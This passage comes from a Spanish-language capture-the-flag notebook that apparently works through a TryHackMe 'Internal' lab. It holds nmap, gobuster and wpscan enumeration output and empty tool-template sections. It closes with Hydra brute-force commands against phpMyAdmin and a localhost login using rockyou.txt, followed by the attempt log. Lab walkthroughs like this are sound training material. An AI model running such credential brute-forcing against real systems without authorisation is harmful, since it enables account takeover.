  |       DBF996C3-DC2A-5859-B767-6B2FC38F2185    4.3     https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185*EXPLOIT*
  |       D0E79214-C9E8-52BD-BC24-093970F5F34E    4.3     https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E*EXPLOIT*
  |       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
  |       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
  |       CVE-2018-1302   4.3     https://vulners.com/cve/CVE-2018-1302
  |       CVE-2018-1301   4.3     https://vulners.com/cve/CVE-2018-1301
  |       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
  |       CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE    4.3     https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE*EXPLOIT*
  |       CD48BD40-E52A-5A8B-AE27-B57C358BB0EE    4.3     https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE*EXPLOIT*
  |       C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79    4.3     https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79*EXPLOIT*
  |       C8799CA3-C88C-5B39-B291-2895BE0D9133    4.3     https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133*EXPLOIT*
  |       C0380E16-C468-5540-A427-7FE34E7CF36B    4.3     https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B*EXPLOIT*
  |       BC027F41-02AD-5D71-A452-4DD62B0F1EE1    4.3     https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1*EXPLOIT*
  |       B946B2A1-2914-537A-BF26-94B48FC501B3    4.3     https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3*EXPLOIT*
  |       B9151905-5395-5622-B789-E16B88F30C71    4.3     https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71*EXPLOIT*
  |       B58E6202-6D04-5CB0-8529-59713C0E13B8    4.3     https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8*EXPLOIT*
  |       B53D7077-1A2B-5640-9581-0196F6138301    4.3     https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301*EXPLOIT*
  |       A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F    4.3     https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F*EXPLOIT*
  |       9EE3F7E3-70E6-503E-9929-67FE3F3735A2    4.3     https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2*EXPLOIT*
  |       9D511461-7D24-5402-8E2A-58364D6E758F    4.3     https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F*EXPLOIT*
  |       9CEA663C-6236-5F45-B207-A873B971F988    4.3     https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988*EXPLOIT*
  |       987C6FDB-3E70-5FF5-AB5B-D50065D27594    4.3     https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594*EXPLOIT*
  |       789B6112-E84C-566E-89A7-82CC108EFCD9    4.3     https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9*EXPLOIT*
  |       788F7DF8-01F3-5D13-9B3E-E4AA692153E6    4.3     https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6*EXPLOIT*
  |       749F952B-3ACF-56B2-809D-D66E756BE839    4.3     https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839*EXPLOIT*
  |       6E484197-456B-55DF-8D51-C2BB4925F45C    4.3     https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C*EXPLOIT*
  |       68E78C64-D93A-5E8B-9DEA-4A8D826B474E    4.3     https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E*EXPLOIT*
  |       6758CFA9-271A-5E99-A590-E51F4E0C5046    4.3     https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046*EXPLOIT*
  |       674BA200-C494-57E6-B1B4-1672DDA15D3C    4.3     https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C*EXPLOIT*
  |       5A54F5DA-F9C1-508B-AD2D-3E45CD647D31    4.3     https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31*EXPLOIT*
  |       4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F    4.3     https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F*EXPLOIT*
  |       4C79D8E5-D595-5460-AA84-18D4CB93E8FC    4.3     https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC*EXPLOIT*
  |       4B44115D-85A3-5E62-B9A8-5F336C24673F    4.3     https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F*EXPLOIT*
  |       4013EC74-B3C1-5D95-938A-54197A58586D    4.3     https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D*EXPLOIT*
  |       3CF66144-235E-5F7A-B889-113C11ABF150    4.3     https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150*EXPLOIT*
  |       379FCF38-0B4A-52EC-BE3E-408A0467BF20    4.3     https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20*EXPLOIT*
  |       365CD0B0-D956-59D6-9500-965BF4017E2D    4.3     https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D*EXPLOIT*
  |       2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F    4.3     https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F*EXPLOIT*
  |       2B4FEB27-377B-557B-AE46-66D677D5DA1C    4.3     https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C*EXPLOIT*
  |       1B75F2E2-5B30-58FA-98A4-501B91327D7F    4.3     https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F*EXPLOIT*
  |       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
  |       1337DAY-ID-33575        4.3     https://vulners.com/zdt/1337DAY-ID-33575        *EXPLOIT*
  |       1145F3D1-0ECB-55AA-B25D-A26892116505    4.3     https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505*EXPLOIT*
  |       108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2    4.3     https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2*EXPLOIT*
  |       0BC014D0-F944-5E78-B5FA-146A8E5D0F8A    4.3     https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A*EXPLOIT*
  |       06076ECD-3FB7-53EC-8572-ABBB20029812    4.3     https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812*EXPLOIT*
  |       05403438-4985-5E78-A702-784E03F724D4    4.3     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4*EXPLOIT*
  |       00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08    4.3     https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08*EXPLOIT*
  |       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
  |       CVE-2023-45802  2.6     https://vulners.com/cve/CVE-2023-45802
  |       OSV:BIT-APACHE-2020-13938       2.1     https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
  |_      PACKETSTORM:152441      0.0     https://vulners.com/packetstorm/PACKETSTORM:152441      *EXPLOIT*
  |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  MAC Address: 02:1F:8F:6A:E6:F3 (Unknown)
  No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
  TCP/IP fingerprint:
  OS:SCAN(V=7.93%E=4%D=2/24%OT=22%CT=1%CU=34142%PV=Y%DS=1%DC=D%G=Y%M=021F8F%T
  OS:M=65D96143%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I
  OS:%TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11N
  OS:W7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F
  OS:4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
  OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
  OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
  OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
  OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
  OS:=Y%DFI=N%T=40%CD=S)
  
  Network Distance: 1 hop
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 52.06 seconds
  

  • CONCLUSION: VEMNOS DOS PUERTOS ABIERTOS, EL 22 SSH Y EL 80 CON APACHE Y VEMOS QUE NOS DIO RUTAS A VARIOOS LOGINS QUE LOS VVEREMOS EN EL BROWSER: http-enum:

    |   /blog/: Blog
    |   /phpmyadmin/: phpMyAdmin
    |   /wordpress/wp-login.php: Wordpress login page.
    |_  /blog/wp-login.php: Wordpress login page

• [x]GOBUSTER --------------------------------->https://www.kali.org/tools/gobuster/

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://internal.thm/
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/24 04:06:59 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
===============================================================
2024/02/24 04:07:00 Finished
===============================================================



----------------------------------


┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://internal.thm/
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.thm/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/24 04:13:03 Starting gobuster in directory enumeration mode
===============================================================
/blog                 (Status: 301) [Size: 311] [--> http://internal.thm/blog/]
/wordpress            (Status: 301) [Size: 316] [--> http://internal.thm/wordpress/]
/javascript           (Status: 301) [Size: 317] [--> http://internal.thm/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://internal.thm/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]
Progress: 218148 / 220561 (98.91%)===============================================================
2024/02/24 04:13:27 Finished
===============================================================

• CONCLUSION: LA BUSQUEDA E DIRECTORIOS EN LA URL CON COMMON.TXT NOS DIO LAS MISMAS RUTAS QUE YA VERIFICAMOS

• WPSCAN👈 --------------------------------->https://wpscan.com/register/

  ┌──(root㉿kali)-[~]
  └─# wpscan --url http://internal.thm/blog/    
  _______________________________________________________________
           __          _______   _____
           \ \        / /  __ \ / ____|
            \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
             \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
              \  /\  /  | |     ____) | (__| (_| | | | |
               \/  \/   |_|    |_____/ \___|\__,_|_| |_|
  
           WordPress Security Scanner by the WPScan Team
                           Version 3.8.22
         Sponsored by Automattic - https://automattic.com/
         @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  _______________________________________________________________
  
  [+] URL: http://internal.thm/blog/ [10.10.252.207]
  [+] Started: Tue Feb 27 23:28:26 2024
  
  Interesting Finding(s):
  
  [+] Headers
   | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
   | Found By: Headers (Passive Detection)
   | Confidence: 100%
  
  [+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%
   | References:
   |  - http://codex.wordpress.org/XML-RPC_Pingback_API
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
   |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
   |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
  
  [+] WordPress readme found: http://internal.thm/blog/readme.html
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 100%
  
  [+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
   | Found By: Direct Access (Aggressive Detection)
   | Confidence: 60%
   | References:
   |  - https://www.iplocation.net/defend-wordpress-from-ddos
   |  - https://github.com/wpscanteam/wpscan/issues/1299
  
  [+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
   | Found By: Rss Generator (Passive Detection)
   |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
   |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/? 
   v=5.4.2</generator>
  
  [+] WordPress theme in use: twentyseventeen
   | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
   | Last Updated: 2024-01-16T00:00:00.000Z
   | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
   | [!] The version is out of date, the latest version is 3.5
   | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
   | Style Name: Twenty Seventeen
   | Style URI: https://wordpress.org/themes/twentyseventeen/
   | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. 
   With a fo...
   | Author: the WordPress team
   | Author URI: https://wordpress.org/
   |
   | Found By: Css Style In Homepage (Passive Detection)
   |
   | Version: 2.3 (80% confidence)
   | Found By: Style (Passive Detection)
   |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 
   2.3'
  
  [+] Enumerating All Plugins (via Passive Methods)
  
  [i] No plugins Found.
  
  [+] Enumerating Config Backups (via Passive and Aggressive Methods)
   Checking Config Backups - Time: 00:00:00 <=================================================> (137 / 137) 
  100.00% Time: 00:00:00
  
  [i] No Config Backups Found.
  
  [!] No WPScan API Token given, as a result vulnerability data has not been output.
  [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
  
  [+] Finished: Tue Feb 27 23:28:31 2024
  [+] Requests Done: 171
  [+] Cached Requests: 5
  [+] Data Sent: 44.709 KB
  [+] Data Received: 364.163 KB
  [+] Memory used: 266.051 MB
  [+] Elapsed time: 00:00:04
  

  • CONCLUSION: VOLVIMOS A CORROBORAR QUE TENEMOS EN LSO RESULTADOS DE WPSCAN EN UNA DE LAS URL QUE ENCONTRO VEMOS UN ARCHIVO CON LA INFO DEL POST PUBLICADO CON UN ID DE USUARIO 'ADMIN' EN LA SIGUIENTE URL: http://internal.thm/blog/index.php/comments/feed/ y mas info.

🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪

🕵️ INVESTIGACION OSINT ❌

INVESTIGACION OSINT

• OSINT Framework👈 --------------------------------->https://osintframework.com/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• Recon-ng👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• Recon-ng👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SHODAN👈 --------------------------------->https://www.shodan.io/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• OSRFrameworK👈 --------------------------------->https://www.kali.org/tools/osrframework/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• SN0INT👈 --------------------------------->https://www.kali.org/tools/sn0int/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• OSINTGRAM👈 --------------------------------->https://github.com/Datalux/Osintgram

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• TWOSINT👈 --------------------------------->https://github.com/falkensmz/tw1tter0s1nt

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X FACEBOOK👈 --------------------------------->https://intelx.io/tools?tab=facebook

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X PERSONAS👈 --------------------------------->https://intelx.io/tools?tab=person

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X TELEFONOS👈 --------------------------------->https://intelx.io/tools?tab=telephone

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X Ubicación 2 Mapa👈 --------------------------------->https://intelx.io/tools?tab=location

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X IMAGEN👈 --------------------------------->https://intelx.io/tools?tab=image

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X NOMBRE DE USUARIO👈 --------------------------------->https://intelx.io/tools?tab=username

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X HASH INVERSA👈 --------------------------------->https://intelx.io/tools?tab=hash

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X ARCHIVOS👈 --------------------------------->https://intelx.io/tools?tab=file

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• INTELLIGENCE X VIN VEHICULOS👈 --------------------------------->https://intelx.io/tools?tab=vin

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

---

---

🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩

⛓️ HASHES Y DESENCRIPTADOS ❌

HASHES Y DESENCRIPTADOS

• JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HASHCAT👈 --------------------------------->https://www.kali.org/tools/hashcat/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• RAINBOWCRACK👈 --------------------------------->https://www.kali.org/tools/rainbowcrack/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• OPHCRACK👈 --------------------------------->https://www.kali.org/tools/ophcrack/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CRACKSTATION👈 --------------------------------->https://crackstation.net/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CAIN Y ABEL👈 --------------------------------->https://github.com/xchwarze/Cain

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• DAVEGRO1👈 --------------------------------->https://github.com/octomagon/davegrohl

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• ElcomSoft Distributed Password Recovery👈 --------------------------------->https://www.elcomsoft.es/edpr.html

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CRACK RAR👈 --------------------------------->https://github.com/TermuxHackz/Crack-rar

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CRACK NINJA RAR👈 --------------------------------->https://github.com/SHUR1K-N/RARNinja-RAR-Password-Cracking-Utility

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CEWL WORDLIST👈 --------------------------------->https://www.kali.org/tools/cewl/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CRUNCH WORDLIST👈 --------------------------------->https://www.kali.org/tools/crunch/ --->PDF-TOOL

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• P4Iwordlists👈 --------------------------------->https://paimonhacking.gitbook.io/p4im0n_h4cking/curso-hacking-con-python/generador-de-wordlist-para-fuerza-bruta-p4iwordlist.py-1.2v

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

• COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/

  # Espacio para fragmento de código Python -->

  • CONCLUSION:

---

---

🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨

💪 FUERZA BRUTA A LOGINS ✔️

FUERZA BRUTA A LOGINS

• HYDRA --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL

  ┌──(root㉿kalipaimon)-[/home/paimon]
  └─# hydra  -l root -P /usr/share/wordlists/rockyou.txt internal.thm http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^&server=1&target=index.php&token=1d5d2a2cccce33ccf1065db901abf9c9&Login:.*Access denied.*" -V 
  

  • CONCLUSION: SEGUIR PROBANDO CON LOS OTROS LOGINS , POR AHORA CON ROOT NO FUNCIONO.

• HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL

  
  ┌──(root㉿kalipaimon)-[/home/paimon]
  └─# hydra  -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 8083 http-post-form 
   "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login:.*Invalid 
   username or password.*" -V
  Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service 
  organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
  
  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-28 17:49:31
  [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries 
  per task
  [DATA] attacking http-post- 
  form://localhost:8083/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login:.*Invalid username or password.*
  [ATTEMPT] target localhost - login "admin" - pass "123456" - 1 of 14344399 [child 0] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "12345" - 2 of 14344399 [child 1] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "password" - 4 of 14344399 [child 3] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "iloveyou" - 5 of 14344399 [child 4] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "princess" - 6 of 14344399 [child 5] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "1234567" - 7 of 14344399 [child 6] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "rockyou" - 8 of 14344399 [child 7] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "12345678" - 9 of 14344399 [child 8] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "abc123" - 10 of 14344399 [child 9] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "nicole" - 11 of 14344399 [child 10] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "daniel" - 12 of 14344399 [child 11] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "babygirl" - 13 of 14344399 [child 12] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "monkey" - 14 of 14344399 [child 13] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "lovely" - 15 of 14344399 [child 14] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "jessica" - 16 of 14344399 [child 15] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "654321" - 17 of 14344399 [child 7] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "michael" - 18 of 14344399 [child 4] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "ashley" - 19 of 14344399 [child 8] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "qwerty" - 20 of 14344399 [child 5] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "111111" - 21 of 14344399 [child 0] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "iloveu" - 22 of 14344399 [child 1] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "00000" - 171 of 14344399 [child 10] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "fernando" - 172 of 14344399 [child 2] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "pokemon" - 173 of 14344399 [child 7] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "maggie" - 174 of 14344399 [child 0] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "corazon" - 175 of 14344399 [child 3] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "chicken" - 176 of 14344399 [child 15] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "pepper" - 177 of 14344399 [child 14] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "cristina" - 178 of 14344399 [child 13] (0/0)
  [ATTEMPT] target localhost - login "admin" - pass "rainbow" - 179 of 14344399 [child 6] (0/0)
